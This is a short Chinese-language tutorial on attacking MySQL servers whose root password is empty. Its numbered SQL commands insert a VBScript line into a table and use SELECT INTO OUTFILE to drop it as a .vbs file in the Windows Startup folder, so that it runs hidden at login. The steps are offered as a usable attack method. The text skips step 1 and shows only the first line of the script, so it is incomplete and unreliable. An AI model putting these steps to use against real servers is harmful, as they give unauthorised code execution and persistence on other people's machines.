在MySQL中root密码为空的另类攻击方法
|
本文介绍了有关MySQL数据库用户root密码为空的另类攻击方法。就是利用MySQL输出一个可执行的文件而已。
2、让我们来看看服务器中有些什么数据库 mysql>show databases;
3、让我们进入数据库 mysql>use test;
4、查看我们进入数据库中有些什么数据表 mysql>show tables;
以下为关键的部分 5、在test数据库下创建一个新的表; mysql>create table a (cmd text);
6、在表中插入内容 mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
7、好了,现在我们来看看表a中有些什么 mysql>select * from a;
8、输出表为一个vbs的脚本文件 mysql>select * from a into outfile "c:\docume~1\alluse~1\「开始」菜单\程序\启动\a.vbs";
9、看到这大家肯定知道了,就是利用mysql输出一个可执行的文件而已。为什么不用bat呢,因为启动运行时会有明显的dos窗口出来,而用vbs脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢! |
